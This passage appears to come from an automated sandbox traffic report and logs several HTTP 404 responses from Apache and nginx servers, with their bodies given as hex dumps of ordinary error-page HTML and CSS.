20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:09:09 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:09:12 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:09:14 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Sep 2024 07:09:34 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Sep 2024 07:09:37 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Sep 2024 07:09:39 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
